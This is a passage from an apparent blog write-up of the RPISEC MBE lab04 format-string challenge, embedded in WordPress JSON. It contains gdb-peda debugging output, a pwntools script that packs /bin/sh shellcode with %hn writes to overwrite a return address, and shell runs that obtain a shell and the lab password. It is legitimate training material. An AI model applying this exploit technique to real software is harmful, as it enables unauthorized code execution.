<code>snprintf<\/code> and the <code>ret<\/code> instruction within the function <code>log_wrapper<\/code>. We set a breakpoint on each address:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngdb-peda$ b *log_wrapper+134\r\nBreakpoint 1 at 0x8048983\r\ngdb-peda$ b *log_wrapper+226\r\nBreakpoint 2 at 0x80489df\r\n<\/pre>\n<p>And run the program:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,18,28]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ r test\r\nStarting program: \/levels\/lab04\/lab4A test\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff8eb (&quot;test&quot;)\r\nEBX: 0xec\r\nECX: 0x1d\r\nEDX: 0xbffff56f --&gt; 0x4b00800\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff668 --&gt; 0xbffff708 --&gt; 0x0\r\nESP: 0xbffff530 --&gt; 0xbffff56f --&gt; 0x4b00800\r\nEIP: 0x8048983 (&lt;log_wrapper+134&gt;:      call   0x80487c0 &lt;snprintf@plt&gt;)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x8048978 &lt;log_wrapper+123&gt;: mov    DWORD PTR &#x5B;esp+0x8],eax\r\n   0x804897c &lt;log_wrapper+127&gt;: mov    DWORD PTR &#x5B;esp+0x4],ebx\r\n   0x8048980 &lt;log_wrapper+131&gt;: mov    DWORD PTR &#x5B;esp],edx\r\n=&gt; 0x8048983 &lt;log_wrapper+134&gt;: call   0x80487c0 &lt;snprintf@plt&gt;\r\n   0x8048988 &lt;log_wrapper+139&gt;: mov    DWORD PTR &#x5B;esp+0x4],0x8048c90\r\n   0x8048990 &lt;log_wrapper+147&gt;: lea    eax,&#x5B;ebp-0x10b]\r\n   0x8048996 &lt;log_wrapper+153&gt;: mov    DWORD PTR &#x5B;esp],eax\r\n   0x8048999 &lt;log_wrapper+156&gt;: call   0x8048700 &lt;strcspn@plt&gt;\r\nGuessed arguments:\r\narg&#x5B;0]: 0xbffff56f --&gt; 0x4b00800\r\narg&#x5B;1]: 0xec\r\narg&#x5B;2]: 0xbffff8eb (&quot;test&quot;)\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff530 --&gt; 
0xbffff56f --&gt; 0x4b00800\r\n0004| 0xbffff534 --&gt; 0xec\r\n0008| 0xbffff538 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0012| 0xbffff53c --&gt; 0xb7e9eb73 (&lt;__GI_strstr+19&gt;:      add    ebx,0x12e48d)\r\n0016| 0xbffff540 --&gt; 0xb7e9548c (&lt;malloc_init_state+12&gt;:        add    ebx,0x137b74)\r\n0020| 0xbffff544 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0024| 0xbffff548 --&gt; 0x8048cda (&quot;Starting back up: &quot;)\r\n0028| 0xbffff54c --&gt; 0x804b008 --&gt; 0xfbad2484\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048983 in log_wrapper ()\r\ngdb-peda$\r\n<\/pre>\n<p>The first breakpoint is hit. We are right before the call to <code>snprintf<\/code>. The address of the buffer is on the top of the stack: <code>0xbffff56f<\/code>.<\/p>\n<p>Let&#8217;s continue to the <code>ret<\/code> instruction:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,11,18,24]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ c\r\nContinuing.\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0xb7fcd000 --&gt; 0x1a9da8\r\nECX: 0x0\r\nEDX: 0x804b0a0 --&gt; 0x0\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff708 --&gt; 0x0\r\nESP: 0xbffff66c --&gt; 0x8048a8b (&lt;main+171&gt;:      mov    eax,DWORD PTR &#x5B;esp+0xc])\r\nEIP: 0x80489df (&lt;log_wrapper+226&gt;:      ret)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x80489d7 &lt;log_wrapper+218&gt;: add    esp,0x134\r\n   0x80489dd &lt;log_wrapper+224&gt;: pop    ebx\r\n   0x80489de &lt;log_wrapper+225&gt;: pop    ebp\r\n=&gt; 0x80489df &lt;log_wrapper+226&gt;: ret\r\n   0x80489e0 &lt;main&gt;:    push   ebp\r\n   0x80489e1 &lt;main+1&gt;:  mov    ebp,esp\r\n   0x80489e3 &lt;main+3&gt;:  and    esp,0xfffffff0\r\n   0x80489e6 
&lt;main+6&gt;:  sub    esp,0x90\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff66c --&gt; 0x8048a8b (&lt;main+171&gt;:     mov    eax,DWORD PTR &#x5B;esp+0xc])\r\n0004| 0xbffff670 --&gt; 0x804b008 --&gt; 0xfbad2c84\r\n0008| 0xbffff674 --&gt; 0x8048cda (&quot;Starting back up: &quot;)\r\n0012| 0xbffff678 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0016| 0xbffff67c --&gt; 0xbffff7a4 --&gt; 0xbffff8d7 (&quot;\/levels\/lab04\/lab4A&quot;)\r\n0020| 0xbffff680 --&gt; 0x3\r\n0024| 0xbffff684 --&gt; 0x9 ('\\t')\r\n0028| 0xbffff688 --&gt; 0xffc0003f\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, 0x080489df in log_wrapper ()\r\ngdb-peda$\r\n<\/pre>\n<p>The top of the stack now holds the return address. Thus the address where the return address is stored is just the value of <code>esp<\/code>: <code>0xbffff66c<\/code>.<\/p>\n<p>Now we have both addresses we were looking for:<br \/>\n&#8211;> buffer: <code>0xbffff56f<\/code><br \/>\n&#8211;> return address: <code>0xbffff66c<\/code><\/p>\n<h2>shellcode and %n specifier<\/h2>\n<p>For the shellcode we can just reuse the shellcode we used in the last labs. 
Because the buffer&#8217;s offset to the 4 byte alignment of the stack is 1 byte, I simply added <code>nops<\/code> (<code>0x90<\/code>) to the shellcode in order to align the following bytes.<\/p>\n<p>The final Python script constructs the format string we can pass to the program as the filename:<\/p>\n<pre class=\"brush: python; first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ cat exploit_lab4A_2.py\r\nimport sys\r\nfrom pwn import *\r\n\r\nshellcode = &quot;\\x90&quot;\\\r\n            &quot;\\x90\\x31\\xc0\\x50&quot;\\\r\n            &quot;\\x68\\x2f\\x2f\\x73&quot;\\\r\n            &quot;\\x68\\x68\\x2f\\x62&quot;\\\r\n            &quot;\\x69\\x6e\\x89\\xe3&quot;\\\r\n            &quot;\\x89\\xc1\\x89\\xc2&quot;\\\r\n            &quot;\\xb0\\x0b\\xcd\\x80&quot;\r\n            # len = 25\r\n\r\naddr_offset    = int(sys.argv&#x5B;1], 16)\r\naddr_buf      = 0xbffff56f - addr_offset\r\naddr_ret_addr = 0xbffff66c - addr_offset\r\n\r\nvalue_u2 = addr_buf &gt;&gt; 16\r\nvalue_l2 = addr_buf &amp; 0xffff\r\n\r\nexpl = shellcode\r\nexpl += p32(addr_ret_addr+2) # arg selector: $14 + 24\/4 = $20\r\nexpl += p32(addr_ret_addr)   # arg selector: $21\r\nexpl += &quot;%&quot; + str(value_u2 - 25 - 8) + &quot;x&quot;\r\nexpl += &quot;%20$hn&quot;\r\nexpl += &quot;%&quot; + str(value_l2 - value_u2) + &quot;x&quot;\r\nexpl += &quot;%21$hn&quot;\r\n\r\nsys.stdout.write(expl)\r\n<\/pre>\n<p>The script basically works like the script in the last levels. 
Only the values have been adjusted.<\/p>\n<p>Now we only need to try different offsets until we get a shell:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\n...\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x60)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\r\n\u2592\u2592\u2592%49118x%20$hn%13584x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x70)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592%49118x%20$hn%13568x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x80)\r\nERROR: Failed to open \u2592\u25921\u2592Ph\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                                         \u0340\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592%49118x%20$hn%13552x%21$hn\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0x90)\r\nERROR: Failed to open (null)\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A $(python exploit_lab4A_2.py 0xa0)\r\n$ whoami\r\nlab4end\r\n$ cat \/home\/lab4end\/.pass\r\n1t_w4s_ju5t_4_w4rn1ng\r\n<\/pre>\n<p>Done! The final password is <code>1t_w4s_ju5t_4_w4rn1ng<\/code>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the last lab, which writeup can be found here, we used publicly available shellcodes as well as shellcodes we had to write on our own, in order to exploit the provided binaries. In this writeup we proceed with the next lab, which focuses on the subject of Format Strings. 
As usual there are three &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=351\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;RPISEC\/MBE: writeup lab04 (Format Strings)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,7],"tags":[8,9,13,10,11,12,14],"class_list":["post-351","post","type-post","status-publish","format-standard","hentry","category-rpisec-mbe","category-writeup","tag-assembly","tag-binary","tag-elf","tag-pwn","tag-r2","tag-reversing","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=351"}],"version-history":[{"count":6,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":365,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/351\/revisions\/365"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}